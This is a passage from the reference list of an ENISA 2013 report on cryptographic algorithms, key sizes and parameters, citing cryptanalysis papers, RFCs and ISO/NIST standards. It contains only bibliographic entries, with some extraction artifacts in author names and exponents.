[98] Orr Dunkelman, Nathan Keller, and Adi Shamir. A practical-time related-key attack on the
KASUMI cryptosystem used in GSM and 3G telephony. In Rabin [290], pages 393–410.
[99] T. Duong and J. Rizzo. Here come the ⊕ninjas. Unpublished manuscript, 2011.
[100] Thai Duong and Juliano Rizzo. The CRIME attack. Presentation at ekoparty Security
Conference, 2012.
[101] Cynthia Dwork, editor. Advances in Cryptology - CRYPTO 2006, 26th Annual International
Cryptology Conference, Santa Barbara, California, USA, August 20-24, 2006, Proceedings ,
volume 4117 of Lecture Notes in Computer Science . Springer, 2006.
[102] E.A.Grechnikov. Collisions for 72-step and 73-step SHA-1: Improvements in the method of
characteristics. Cryptology ePrint Archive, Report 2010/413, 2010. http://eprint.iacr.
org/ .
[103] D. Eastlake. Cryptographic Algorithm Implementation Requirements for Encapsulating Se-
curity Payload (ESP) and Authentication Header (AH). RFC 4305 (Proposed Standard),
December 2005. Obsoleted by RFC 4835.
[104] ECRYPT II NoE. ECRYPT II Yearly Report on Algorithms and Key Lengths (2008-2009).
ECRYPT II deliverable D.SPA.7-1.0, 2009.
[105] ECRYPT II NoE. ECRYPT II Yearly Report on Algorithms and Key Lengths (2009-2010).
ECRYPT II deliverable D.SPA.13-1.0, 2010.
[106] ECRYPT II NoE. ECRYPT II Yearly Report on Algorithms and Key Lengths (2010-2011).
ECRYPT II deliverable D.SPA.17-1.0, 2011.
[107] ECRYPT II NoE. ECRYPT II Yearly Report on Algorithms and Key Lengths (2011-2012).
ECRYPT II deliverable D.SPA.20-1.0, 2012.
[108] ECRYPT NoE. ECRYPT Yearly Report on Algorithms and Key Lengths (2004). ECRYPT
deliverable D.SPA.10-1.1, 2004.
[109] ECRYPT NoE. ECRYPT Yearly Report on Algorithms and Key Lengths (2005). ECRYPT
deliverable D.SPA.16-1.0, 2005.
[110] ECRYPT NoE. ECRYPT Yearly Report on Algorithms and Key Lengths (2006). ECRYPT
deliverable D.SPA.21-1.0, 2006.
[111] ECRYPT NoE. ECRYPT Yearly Report on Algorithms and Key Lengths (2007-2008).
ECRYPT deliverable D.SPA.28-1.0, 2008.
[112] EMV Co. Book 2 – Security and key management. EMV 4.3, 2011.
Page: 73
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[113] ENISA. The use of cryptographic techniques in europe. http:
//www.enisa.europa.eu/activities/identity-and-trust/library/
the-use-of-cryptographic-techniques-in-europe , 2011.
[114] ENISA. Enisa study on securing personal data. recommended cryptographic measures, 2013.
[115] ENISA. Work Programme 2013. http://www.enisa.europa.eu/publications/
programmes-reports , 2013.
[116] Matthias Ernst, Ellen Jochemsz, Alexander May, and Benne de Weger. Partial key exposure
attacks on RSA up to full size exponents. In Ronald Cramer, editor, EUROCRYPT , volume
3494 of Lecture Notes in Computer Science , pages 371–386. Springer, 2005.
[117] ETSI TS 102 176-. Electronic signatures and infrastructures (ESI); Algorithms and param-
eters for secure electronic signatures; Part 1: Hash functions and asymmetric algorithms.
European Telecommunications Standards Institute, 2007.
[118] ETSI/SAGE Specification. Specification of the 3GPP Confidentiality and Integrity Algo-
rithms. Document 2: Kasumi Algorithm Specification. ETSI/SAGE, 2011.
[119] EU. EC regulation (EU) No 611/2013 on the measures applicable to the notification
of personal data breaches under Directive 2002/58/EC on privacy and electronic commu-
nications. http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=OJ:L:2013:173:
0002:0008:en:PDF .
[120] Federal Information Processing Standards Publication 197. Specification for the advanced
encryption standard (AES). National Institute of Standards and Technology, 2001.
[121] Niels Ferguson and Bruce Schneier. A cryptographic evaluation of IPsec. Unpublished
manuscript available from http://www.schneier.com/paper-ipsec.html , February 1999.
[122] Scott R. Fluhrer and Stefan Lucks. Analysis of the E0encryption system. In Vaudenay and
Youssef [338], pages 38–48.
[123] Scott R. Fluhrer, Itsik Mantin, and Adi Shamir. Weaknesses in the key scheduling algorithm
of RC4. In Vaudenay and Youssef [338], pages 1–24.
[124] Jens Franke. RSA576. Post to various internet discussion boards/email lists, 2003.
[125] Jens Franke. RSA576. Post to various internet discussion boards/email lists, 2005.
[126] S. Frankel, R. Glenn, and S. Kelly. The AES-CBC Cipher Algorithm and Its Use with IPsec.
RFC 3602 (Proposed Standard), September 2003.
Page: 74
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[127] S. Frankel and H. Herbert. The AES-XCBC-MAC-96 Algorithm and Its Use With IPsec.
RFC 3566 (Proposed Standard), September 2003.
[128] M. Friedl, N. Provos, and W. Simpson. Diffie-Hellman Group Exchange for the Secure Shell
(SSH) Transport Layer Protocol. RFC 4419 (Proposed Standard), March 2006.
[129] D. Fu and J. Solinas. Elliptic Curve Groups modulo a Prime (ECP Groups) for IKE and
IKEv2. RFC 5903 (Informational), June 2010.
[130] Eiichiro Fujisaki, Tatsuaki Okamoto, David Pointcheval, and Jacques Stern. RSA-OAEP is
secure under the RSA assumption. In Kilian [198], pages 260–274.
[131] M Peeters G. Bertoni, J. Daemen and G. Van Assche. The Keccak sponge function family.
http://keccak.noekeon.org/ .
[132] Pierrick Gaudry, Florian Hess, and Nigel P. Smart. Constructive and destructive facets of
Weil descent on elliptic curves. J. Cryptology , 15(1):19–46, 2002.
[133] Henri Gilbert, editor. Advances in Cryptology - EUROCRYPT 2010, 29th Annual Inter-
national Conference on the Theory and Applications of Cryptographic Techniques, French
Riviera, May 30 - June 3, 2010. Proceedings , volume 6110 of Lecture Notes in Computer
Science . Springer, 2010.
[134] Danilo Gligoroski, Suzana Andova, and Svein J. Knapskog. On the importance of the key
separation principle for different modes of operation. In Liqun Chen, Yi Mu, and Willy Susilo,
editors, ISPEC , volume 4991 of Lecture Notes in Computer Science , pages 404–418. Springer,
2008.
[135] Daniel M. Gordon. Discrete logarithms in GF(P) using the number field sieve. SIAM J.
Discrete Math. , 6(1):124–138, 1993.
[136] GOST R 34-10-2001. Information technology – Cryptography data security – Formation and
verification process of [electronic] signatures. State Standard of the Russion Federation, 2001.
[137] Robert Granger. Discrete logarithms in GF(26120). Post to NM-
BRTHRY@LISTSERV.NODAK.EDU, 2013.
[138] Jian Guo, San Ling, Christian Rechberger, and Huaxiong Wang. Advanced meet-in-the-
middle preimage attacks: First results on full Tiger, and improved results on MD4 and
SHA-2. In Masayuki Abe, editor, ASIACRYPT , volume 6477 of Lecture Notes in Computer
Science , pages 56–75. Springer, 2010.
[139] Shai Halevi. EME*: Extending EME to handle arbitrary-length messages with associated
data. In Canteaut and Viswanathan [70], pages 315–327.
Page: 75
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[140] Shai Halevi, editor. Advances in Cryptology - CRYPTO 2009, 29th Annual International
Cryptology Conference, Santa Barbara, CA, USA, August 16-20, 2009. Proceedings , volume
5677 of Lecture Notes in Computer Science . Springer, 2009.
[141] Shai Halevi and Phillip Rogaway. A parallelizable enciphering mode. In Okamoto [269], pages
292–304.
[142] Finn Michael Halvorsen, Olav Haugen, Martin Eian, and Stig Fr. Mjølsnes. An improved
attack on TKIP. In Audun Jøsang, Torleiv Maseng, and Svein J. Knapskog, editors, NordSec ,
volume 5838 of Lecture Notes in Computer Science , pages 120–132. Springer, 2009.
[143] Helena Handschuh and Bart Preneel. Key-recovery attacks on universal hash function based
MAC algorithms. In Wagner [339], pages 144–161.
[144] D. Harkins and D. Carrel. The Internet Key Exchange (IKE). RFC 2409 (Proposed Standard),
November 1998. Obsoleted by RFC 4306, updated by RFC 4109.
[145] B. Harris. RSA Key Exchange for the Secure Shell (SSH) Transport Layer Protocol. RFC
4432 (Proposed Standard), March 2006.
[146] Johan H ̊ astad. Solving simultaneous modular equations of low degree. SIAM J. Comput. ,
17(2):336–341, 1988.
[147] Johan H ̊ astad and Mats N ̈ aslund. The security of all RSA and discrete log bits. J. ACM ,
51(2):187–230, 2004.
[148] Nadia Heninger, Zakir Durumeric, Eric Wustrow, and J.Alex Halderman. Mining your Ps and
Qs: Detection of widespread weak keys in network devices. In USENIX Security Symposium
– 2012 , pages 205–220, 2012.
[149] Miia Hermelin and Kaisa Nyberg. Correlation properties of the Bluetooth combiner generator.
In JooSeok Song, editor, ICISC , volume 1787 of Lecture Notes in Computer Science , pages
17–29. Springer, 1999.
[150] Mathias Herrmann and Alexander May. Maximizing small root bounds by linearization and
applications to small secret exponent RSA. In Phong Q. Nguyen and David Pointcheval,
editors, Public Key Cryptography , volume 6056 of Lecture Notes in Computer Science , pages
53–69. Springer, 2010.
[151] Erwin Hess, Marcus Schafheutle, and Pascale Serf. The digital signature scheme ECGDSA,
2006.
[152] P. Hoffman. Cryptographic Suites for IPsec. RFC 4308 (Proposed Standard), December 2005.
Page: 76
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[153] R. Housley. Using Advanced Encryption Standard (AES) Counter Mode With IPsec Encap-
sulating Security Payload (ESP). RFC 3686 (Proposed Standard), January 2004.
[154] R. Housley. Using Advanced Encryption Standard (AES) CCM Mode with IPsec Encapsu-
lating Security Payload (ESP). RFC 4309 (Proposed Standard), December 2005.
[155] Nick Howgrave-Graham and Nigel P. Smart. Lattice attacks on digital signature schemes.
Des. Codes Cryptography , 23(3):283–290, 2001.
[156] G. Hudson. Camellia Encryption for Kerberos 5. RFC 6803 (Informational), November 2012.
[157] IEEE 802.11. Wireless LAN medium access control MAC and physical layer PHY specifica-
tions. Institute of Electrical and Electronics Engineers Standard, 1999.
[158] IEEE 802.11-2012 (Revision of IEEE 802.11-2007). Wireless LAN medium access control
MAC and physical layer PHY specifications. Institute of Electrical and Electronics Engineers
Standard, 2012.
[159] IEEE 802.15.4 . Law rate WPAN. Institute of Electrical and Electronics Engineers Standard,
2012.
[160] IEEE P1363.3 (Draft D5). Identity-based public key cryptography using pairings. Institute
of Electrical and Electronics Engineers Standard, 2012.
[161] K. Igoe and J. Solinas. AES Galois Counter Mode for the Secure Shell Transport Layer
Protocol. RFC 5647 (Informational), August 2009.
[162] Sebastiaan Indesteege, Florian Mendel, Bart Preneel, and Christian Rechberger. Collisions
and other non-random properties for step-reduced SHA-256. In Roberto Maria Avanzi, Liam
Keliher, and Francesco Sica, editors, Selected Areas in Cryptography , volume 5381 of Lecture
Notes in Computer Science , pages 276–293. Springer, 2008.
[163] Takanori Isobe, Yuhei Watanabe Toshihiro Ohigashi, and Masakatu Morii. Full plaintext
recovery attack on broadcast RC4. In Moriai [245]. To appear.
[164] ISO/IEC 14888-3. Information technology – Security techniques – Digital signatures with
appendix – Part 3: Discrete logarithm based mechanisms. International Organization for
Standardization, 2009.
[165] ISO/IEC 14888-3. Information technology – Security techniques – Digital signatures with
appendix – Part 3: Discrete logarithm based mechanisms – Ammendment 1. International
Organization for Standardization, 2009.
[166] ISO/IEC 18033-2. Information technology – Security techniques – Encryption algorithms –
Part 2: Asymmetric Ciphers. International Organization for Standardization, 2006.
Page: 77
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[167] ISO/IEC 18033-4. Information technology – Security techniques – Encryption algorithms –
Part 4: Stream ciphers. International Organization for Standardization, 2011.
[168] ISO/IEC 19972. Information technology – Security techniques – Authenticated encryption.
International Organization for Standardization, 2009.
[169] ISO/IEC 29192-3. Information technology – Security techniques – Lightweight cryptography
– Part 3: Stream ciphers. International Organization for Standardization, 2012.
[170] ISO/IEC 9796-2. Information technology – Security techniques – Digital signatures giving
message recovery – Part 2: Integer factorization based schemes. International Organization
for Standardization, 2010.
[171] ISO/IEC 9797-1:2011. Information technology – Security techniques – Digital signatures giv-
ing message recovery – Part 1: Mechanisms using a block cipher. International Organization
for Standardization, 2011.
[172] ISO/IEC 9797-2:2011. Information technology – Security techniques – Digital signatures
giving message recovery – Part 2: Mechanisms using a dedicated hash-function. International
Organization for Standardization, 2011.
[173] Tetsu Iwata and Kaoru Kurosawa. OMAC: One-key CBC MAC. In Thomas Johansson,
editor, FSE, volume 2887 of Lecture Notes in Computer Science , pages 129–153. Springer,
2003.
[174] Tetsu Iwata, Keisuke Ohashi, and Kazuhiko Minematsu. Breaking and repairing GCM secu-
rity proofs. In Safavi-Naini and Canetti [304], pages 31–49.
[175] Tibor Jager, Florian Kohlar, Sven Sch ̈ age, and J ̈ org Schwenk. On the security of TLS-DHE
in the standard model. IACR Cryptology ePrint Archive , 2011:219, 2011.
[176] Tibor Jager, Florian Kohlar, Sven Sch ̈ age, and J ̈ org Schwenk. On the security of TLS-DHE
in the standard model. In Safavi-Naini and Canetti [304], pages 273–293.
[177] Thomas Johansson and Phong Q. Nguyen, editors. Advances in Cryptology - EUROCRYPT
2013, 32nd Annual International Conference on the Theory and Applications of Cryptographic
Techniques, Athens, Greece, May 26-30, 2013. Proceedings , volume 7881 of Lecture Notes in
Computer Science . Springer, 2013.
[178] Jakob Jonsson. Security proofs for the RSA-PSS signature scheme and its variants. Cryptol-
ogy ePrint Archive, Report 2001/053, 2001. http://eprint.iacr.org/ .
[179] Jakob Jonsson. On the security of CTR + CBC-MAC. In Kaisa Nyberg and Howard M.
Heys, editors, Selected Areas in Cryptography , volume 2595 of Lecture Notes in Computer
Science , pages 76–93. Springer, 2002.
Page: 78
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[180] Antoine Joux. Comments on the choice between CWC or GCM – authentication weaknesses in
GCM. http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/comments/CWC-GCM/
Ferguson2.pdf .
[181] Antoine Joux. Comments on the draft GCM specification – authentication failures in NIST
version of GCM. http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/comments/
800-38_Series-Drafts/GCM/Joux_comments.pdf .
[182] Antoine Joux. Discrete logarithms in GF(26168). Post to NM-
BRTHRY@LISTSERV.NODAK.EDU, 2013.
[183] Antoine Joux. Faster index calculus for the medium prime case application to 1175-bit and
1425-bit finite fields. In Johansson and Nguyen [177], pages 177–193.
[184] Antoine Joux. A new index calculus algorithm with complexity L(1/4 +o(1)) in very small
characteristic. IACR Cryptology ePrint Archive , 2013:95, 2013.
[185] Antoine Joux, Reynald Lercier, Nigel P. Smart, and Frederik Vercauteren. The number field
sieve in the medium prime case. In Dwork [101], pages 326–344.
[186] Hendrik W. Lenstra Jr. Factoring integers with elliptic curves. Annals of Mathematics ,
126(3):649–673, 1987.
[187] Saqib A. Kakvi and Eike Kiltz. Optimal security proofs for full domain hash, revisited. In
David Pointcheval and Thomas Johansson, editors, EUROCRYPT , volume 7237 of Lecture
Notes in Computer Science , pages 537–553. Springer, 2012.
[188] Ju-Sung Kang, Sang Uk Shin, Dowon Hong, and Okyeon Yi. Provable security of KASUMI
and 3GPP encryption mode f8. In Colin Boyd, editor, ASIACRYPT , volume 2248 of Lecture
Notes in Computer Science , pages 255–271. Springer, 2001.
[189] Orhun Kara and Cevat Manap. A new class of weak keys for Blowfish. In Biryukov [43],
pages 167–180.
[190] A. Kato, M. Kanda, and S. Kanno. Modes of Operation for Camellia for Use with IPsec.
RFC 5529 (Proposed Standard), April 2009.
[191] C. Kaufman. Internet Key Exchange (IKEv2) Protocol. RFC 4306 (Proposed Standard),
December 2005. Obsoleted by RFC 5996, updated by RFC 5282.
[192] C. Kaufman, P. Hoffman, Y. Nir, and P. Eronen. Internet Key Exchange Protocol Version 2
(IKEv2). RFC 5996 (Proposed Standard), September 2010. Updated by RFC 5998.
[193] S. Kelly and S. Frankel. Using HMAC-SHA-256, HMAC-SHA-384, and HMAC-SHA-512 with
IPsec. RFC 4868 (Proposed Standard), May 2007.
Page: 79
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[194] S. Kent. Extended Sequence Number (ESN) Addendum to IPsec Domain of Interpretation
(DOI) for Internet Security Association and Key Management Protocol (ISAKMP). RFC
4304 (Proposed Standard), December 2005.
[195] S. Kent. IP Authentication Header. RFC 4302 (Proposed Standard), December 2005.
[196] S. Kent. IP Encapsulating Security Payload (ESP). RFC 4303 (Proposed Standard), Decem-
ber 2005.
[197] S. Kent and K. Seo. Security Architecture for the Internet Protocol. RFC 4301 (Proposed
Standard), December 2005. Updated by RFC 6040.
[198] Joe Kilian, editor. Advances in Cryptology - CRYPTO 2001, 21st Annual International
Cryptology Conference, Santa Barbara, California, USA, August 19-23, 2001, Proceedings ,
volume 2139 of Lecture Notes in Computer Science . Springer, 2001.
[199] Aleksandar Kircanski and Amr M. Youssef. On the sliding property of SNOW 3G and SNOW
2.0. IET Information Security , 5(4):199–206, 2011.
[200] T. Kivinen and M. Kojo. More Modular Exponential (MODP) Diffie-Hellman groups for
Internet Key Exchange (IKE). RFC 3526 (Proposed Standard), May 2003.
[201] Thorsten Kleinjung. Discrete logarithms in GF(p) — 160 digits. Post to NM-
BRTHRY@LISTSERV.NODAK.EDU, 2007.
[202] Thorsten Kleinjung, Kazumaro Aoki, Jens Franke, Arjen K. Lenstra, Emmanuel Thom ́ e,
Joppe W. Bos, Pierrick Gaudry, Alexander Kruppa, Peter L. Montgomery, Dag Arne Osvik,
Herman J. J. te Riele, Andrey Timofeev, and Paul Zimmermann. Factorization of a 768-bit
RSA modulus. In Rabin [290], pages 333–350.
[203] Lars R. Knudsen, editor. Advances in Cryptology - EUROCRYPT 2002, International Confer-
ence on the Theory and Applications of Cryptographic Techniques, Amsterdam, The Nether-
lands, April 28 - May 2, 2002, Proceedings , volume 2332 of Lecture Notes in Computer
Science . Springer, 2002.
[204] John T. Kohl. The use of encryption in Kerberos for network authentication. In Brassard [62],
pages 35–43.
[205] Tadayoshi Kohno, John Viega, and Doug Whiting. CWC: A high-performance conventional
authenticated encryption mode. In Roy and Meier [302], pages 408–426.
[206] Geir M. Køien and Vladimir A. Oleshchuk. Location privacy for cellular systems; analysis
and solution. In George Danezis and David Martin, editors, Privacy Enhancing Technologies ,
volume 3856 of Lecture Notes in Computer Science , pages 40–58. Springer, 2005.
Page: 80
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[207] H. Krawczyk, M. Bellare, and R. Canetti. HMAC: Keyed-Hashing for Message Authentica-
tion. RFC 2104 (Best Current Practice), February 1997.
[208] Hugo Krawczyk, Kenneth G. Paterson, and Hoeteck Wee. On the security of the TLS protocol:
A systematic analysis. In CRYPTO , 2013.
[209] T. Krovetz. UMAC: Message Authentication Code using Universal Hashing. RFC 4418 (Best
Current Practice), March 2006.
[210] Mario Lamberger, Florian Mendel, Christian Rechberger, Vincent Rijmen, and Martin
Schl ̈ affer. Rebound distinguishers: Results on the full Whirlpool compression function. In
Matsui [230], pages 126–143.
[211] Franck Landelle and Thomas Peyrin. Cryptanalysis of full RIPEMD-128. In Johansson and
Nguyen [177], pages 228–244.
[212] Laurie Law, Alfred Menezes, Minghua Qu, Jerome A. Solinas, and Scott A. Vanstone. An
efficient protocol for authenticated key agreement. Des. Codes Cryptography , 28(2):119–134,
2003.
[213] Dong Hoon Lee and Xiaoyun Wang, editors. Advances in Cryptology - ASIACRYPT 2011 -
17th International Conference on the Theory and Application of Cryptology and Information
Security, Seoul, South Korea, December 4-8, 2011. Proceedings , volume 7073 of Lecture Notes
in Computer Science . Springer, 2011.
[214] Arjen Lenstra. Key lengths. In Hossein Bidgoli, editor, Handbook of Information Security:
Volume II: Information Warfare; Social Legal, and International Issues; and Security Foun-
dations , pages 617–635. Wiley, 2004.
[215] Arjen K. Lenstra, James P. Hughes, Maxime Augier, Joppe W. Bos, Thorsten Kleinjung,
and Christophe Wachter. Ron was wrong, Whit is right. IACR Cryptology ePrint Archive ,
2012:64, 2012.
[216] Arjen K. Lenstra and Hendrik W. Lenstra. The development of the number field sieve , volume
1554 of Lecture Notes in Mathematics . Springer, 1993.
[217] Arjen K. Lenstra and Eric R. Verheul. Selecting cryptographic key sizes. Datenschutz und
Datensicherheit , 24(3), 2000.
[218] M. Lepinski and S. Kent. Additional Diffie-Hellman Groups for Use with IETF Standards.
RFC 5114 (Informational), January 2008.
[219] Ga ̈ etan Leurent. Message freedom in MD4 and MD5 collisions: Application to APOP. In
Biryukov [43], pages 309–328.
Page: 81
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[220] Chu-Wee Lim and Khoongming Khoo. An analysis of XSL applied to BES. In Biryukov [43],
pages 242–253.
[221] J. Linn. Generic Security Service Application Program Interface Version 2, Update 1. RFC
2743 (Proposed Standard), January 2000. Updated by RFC 5554.
[222] Moses Liskov and Kazuhiko Minematsu. Comments on the proposal to approve XTS-AES
– Comments on XTS-AES. http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/
comments/XTS/XTS_comments-Liskov_Minematsu.pdf .
[223] Yi Lu, Willi Meier, and Serge Vaudenay. The conditional correlation attack: A practical
attack on Bluetooth encryption. In Shoup [320], pages 97–117.
[224] C. Madson and R. Glenn. The Use of HMAC-MD5-96 within ESP and AH. RFC 2403
(Proposed Standard), November 1998.
[225] C. Madson and R. Glenn. The Use of HMAC-SHA-1-96 within ESP and AH. RFC 2404
(Proposed Standard), November 1998.
[226] Subhamoy Maitra and Goutam Paul. New form of permutation bias and secret key leakage
in keystream bytes of RC4. In Nyberg [267], pages 253–269.
[227] James Manger. A chosen ciphertext attack on RSA optimal asymmetric encryption padding
(OAEP) as standardized in PKCS #1 v2.0. In Kilian [198], pages 230–238.
[228] M. Matsui, J. Nakajima, and S. Moriai. A Description of the Camellia Encryption Algorithm.
RFC 3713 (Informational), April 2004.
[229] Mitsuru Matsui. Linear cryptoanalysis method for DES cipher. In Tor Helleseth, editor,
EUROCRYPT , volume 765 of Lecture Notes in Computer Science , pages 386–397. Springer,
1993.
[230] Mitsuru Matsui, editor. Advances in Cryptology - ASIACRYPT 2009, 15th International
Conference on the Theory and Application of Cryptology and Information Security, Tokyo,
Japan, December 6-10, 2009. Proceedings , volume 5912 of Lecture Notes in Computer Science .
Springer, 2009.
[231] Ueli M. Maurer, editor. Advances in Cryptology - EUROCRYPT ’96, International Con-
ference on the Theory and Application of Cryptographic Techniques, Saragossa, Spain, May
12-16, 1996, Proceeding , volume 1070 of Lecture Notes in Computer Science . Springer, 1996.
[232] Alexander Maximov and Alex Biryukov. Two trivial attacks on Trivium. In Adams et al. [6],
pages 36–55.
Page: 82
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[233] Alexander Maximov and Dmitry Khovratovich. New state recovery attack on RC4. In
Wagner [339], pages 297–316.
[234] D. McGrew and D. Bailey. AES-CCM Cipher Suites for Transport Layer Security (TLS).
RFC 6655 (Best Current Practice), July 2012.
[235] D. McGrew and J. Viega. The Use of Galois Message Authentication Code (GMAC) in IPsec
ESP and AH. RFC 4543 (Proposed Standard), May 2006.
[236] David A. McGrew. Efficient authentication of large, dynamic data sets using Galois/Counter
mode (GCM). In IEEE Security in Storage Workshop , pages 89–94. IEEE Computer Society,
2005.
[237] David A. McGrew and John Viega. The security and performance of the Galois/Counter
mode (GCM) of operation. In Canteaut and Viswanathan [70], pages 343–355.
[238] Florian Mendel, Tomislav Nad, Stefan Scherz, and Martin Schl ̈ affer. Differential attacks on
reduced ripemd-160. In Dieter Gollmann and Felix C. Freiling, editors, ISC, volume 7483 of
Lecture Notes in Computer Science , pages 23–38. Springer, 2012.
[239] Florian Mendel, Tomislav Nad, and Martin Schl ̈ affer. Improving local collisions: New attacks
on reduced SHA-256. In Johansson and Nguyen [177], pages 262–278.
[240] Florian Mendel, Norbert Pramstaller, Christian Rechberger, and Vincent Rijmen. On the
collision resistance of RIPEMD-160. In Sokratis K. Katsikas, Javier Lopez, Michael Backes,
Stefanos Gritzalis, and Bart Preneel, editors, ISC, volume 4176 of Lecture Notes in Computer
Science , pages 101–116. Springer, 2006.
[241] Florian Mendel, Christian Rechberger, and Martin Schl ̈ affer. Update on SHA-1. Presented
at Rump Session of Crypto 2007, 2007.
[242] Alfred Menezes, Tatsuaki Okamoto, and Scott A. Vanstone. Reducing elliptic curve loga-
rithms to logarithms in a finite field. IEEE Transactions on Information Theory , 39(5):1639–
1646, 1993.
[243] S. P. Miller, B. C. Neuman, J. I. Schiller, and J. H. Saltzer. Kerberos authentication and
authorization system. In In Project Athena Technical Plan , 1987.
[244] Vebjørn Moen, H ̊ avard Raddum, and Kjell Jørgen Hole. Weaknesses in the temporal key
hash of WPA. Mobile Computing and Communications Review , 8(2):76–83, 2004.
[245] Shiho Moriai, editor. Fast Software Encryption - 20th International Workshop, FSE 2013,
Singapore, March 11-13, 2013. Revised Selected Papers , Lecture Notes in Computer Science.
Springer, 2013.
Page: 83
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[246] Masakatu Morii and Yosuke Todo. Cryptanalysis for RC4 and breaking WEP/WPA-TKIP.
IEICE Transactions , 94-D(11):2087–2094, 2011.
[247] Paul Morrissey, Nigel P. Smart, and Bogdan Warinschi. The TLS handshake protocol: A
modular analysis. J. Cryptology , 23(2):187–223, 2010.
[248] Steven J. Murdoch, Saar Drimer, Ross J. Anderson, and Mike Bond. Chip and pin is broken.
InIEEE Symposium on Security and Privacy , pages 433–446. IEEE Computer Society, 2010.
[249] Sean Murphy and Matthew J. B. Robshaw. Essential algebraic structure within the AES.
In Moti Yung, editor, CRYPTO , volume 2442 of Lecture Notes in Computer Science , pages
1–16. Springer, 2002.
[250] Mridul Nandi. A unified method for improving PRF bounds for a class of blockcipher based
MACs. In Seokhie Hong and Tetsu Iwata, editors, FSE, volume 6147 of Lecture Notes in
Computer Science , pages 212–229. Springer, 2010.
[251] National Security Agency. Suite b cryptography. http://www.nsa.gov/ia/programs/
suiteb_cryptography/index.shtml , 2009.
[252] Roger M. Needham and Michael D. Schroeder. Using encryption for authentication in large
networks of computers. Commun. ACM , 21(12):993–999, 1978.
[253] C. Neuman, T. Yu, S. Hartman, and K. Raeburn. The Kerberos Network Authentication
Service (V5). RFC 4120 (Proposed Standard), July 2005. Updated by RFCs 4537, 5021,
5896, 6111, 6112, 6113, 6649, 6806.
[254] Gregory Neven, Nigel P. Smart, and Bogdan Warinschi. Hash function requirements for
Schnorr signatures. J. Mathematical Cryptology , 3(1):69–87, 2009.
[255] Phong Q. Nguyen and Igor Shparlinski. The insecurity of the digital signature algorithm with
partially known nonces. J. Cryptology , 15(3):151–176, 2002.
[256] Phong Q. Nguyen and Igor Shparlinski. The insecurity of the elliptic curve digital signature
algorithm with partially known nonces. Des. Codes Cryptography , 30(2):201–217, 2003.
[257] NIST Special Publication 800-108. Recommendation for key derivation using pseudorandom
functions. National Institute of Standards and Technology, 2009.
[258] NIST Special Publication 800-38A. Recommendation for block cipher modes of operation –
Modes and techniques. National Institute of Standards and Technology, 2001.
[259] NIST Special Publication 800-38C. Recommendation for block cipher modes of operation –
The CCM mode for authentication and confidentiality. National Institute of Standards and
Technology, 2004.
Page: 84
Algorithms, Key Size and Parameters Report – 2013 Recommendations
[260] NIST Special Publication 800-38D. Recommendation for block cipher modes of operation –
Galois/Counter Mode (GCM) and GMAC. National Institute of Standards and Technology,
2007.
[261] NIST Special Publication 800-38E. Recommendation for block cipher modes of operation –
The XTS-AES mode for confidentiality on storage devices. National Institute of Standards
and Technology, 2010.
[262] NIST Special Publication 800-56A. Recommendation for pair-wise key establishment schemes
using discrete logarithm cryptography. National Institute of Standards and Technology, 2007.
[263] NIST Special Publication 800-56B. Recommendation for pair-wise key establishment schemes
using integer factorization cryptography. National Institute of Standards and Technology,
2009.
[264] NIST Special Publication 800-56C. Recommendation for key derivation through extraction-
then-expansion. National Institute of Standards and Technology, 2009.
[265] NIST Special Publication 800-57. Recommendation for key management – Part 1: General
(Revision 3). National Institute of Standards and Technology, 2012.
[266] NIST Special Publication 800-67-Rev1. Recommendation for the triple data encryption stan-
dard algorithm (tdea) block cipher. National Institute of Standards and Technology, 2012.
[267] Kaisa Nyberg, editor. Fast Software Encryption, 15th International Workshop, FSE 2008,
Lausanne, Switzerland, February 10-13, 2008, Revised Selected Papers , volume 5086 of Lec-
ture Notes in Computer Science . Springer, 2008.
[268] Kaisa Nyberg and Johan Wall ́ en. Improved linear distinguishers for SNOW 2.0. In Matthew
J. B. Robshaw, editor, FSE, volume 4047 of Lecture Notes in Computer Science , pages 144–
162. Springer, 2006.
[269] Tatsuaki Okamoto, editor. Topics in Cryptology - CT-RSA 2004, The Cryptographers’ Track
at the RSA Conference 2004, San Francisco, CA, USA, February 23-27, 2004, Proceedings ,
volume 2964 of Lecture Notes in Computer Science . Springer, 2004.
[270] H. Orman and P. Hoffman. Determining Strengths For Public Keys Used For Exchanging
Symmetric Keys. RFC 3766 (Best Current Practice), April 2004.
[271] Kenneth G. Paterson. A cryptographic tour of the IPsec standards. Cryptology ePrint
Archive, Report 2006/097, 2006. http://eprint.iacr.org/ .
[272] Kenneth G. Paterson, editor. Advances in Cryptology - EUROCRYPT 2011 - 30th Annual In-
ternational Conference on the Theory and Applications of Cryptographic Techniques, Tallinn,
Page: 85
Algorithms, Key Size and Parameters Report – 2013 Recommendations
Estonia, May 15-19, 2011. Proceedings , volume 6632 of Lecture Notes in Computer Science .
Springer, 2011.
[273] Kenneth G. Paterson, Thomas Ristenpart, and Thomas Shrimpton. Tag size does matter:
Attacks and proofs for the tls record protocol. In Lee and Wang [213], pages 372–389.
[274] Kenneth G. Paterson, Jacob C. N. Schuldt, Martijn Stam, and Susan Thomson. On the joint
security of encryption and signature, revisited. In Lee and Wang [213], pages 161–178.
[275] Kenneth G. Paterson and Gaven J. Watson. Plaintext-dependent decryption: A formal
security treatment of SSH-CTR. In Gilbert [133], pages 345–361.
[276] Kenneth G. Paterson and Arnold K. L. Yau. Padding Oracle Attacks on the ISO CBC Mode
Encryption Standard. In Okamoto [269], pages 305–323.
[277] Kenneth G. Paterson and Arnold K. L. Yau. Cryptography in theory and practice: The case
of encryption in IPsec. In Vaudenay [336], pages 12–29.
[278] R. Pereira and R. Adams. The ESP CBC-Mode Cipher Algorithms. RFC 2451 (Proposed
Standard), November 1998.
[279] Erez Petrank and Charles Rackoff. CBC MAC for real-time data sources. J. Cryptology ,
13(3):315–338, 2000.
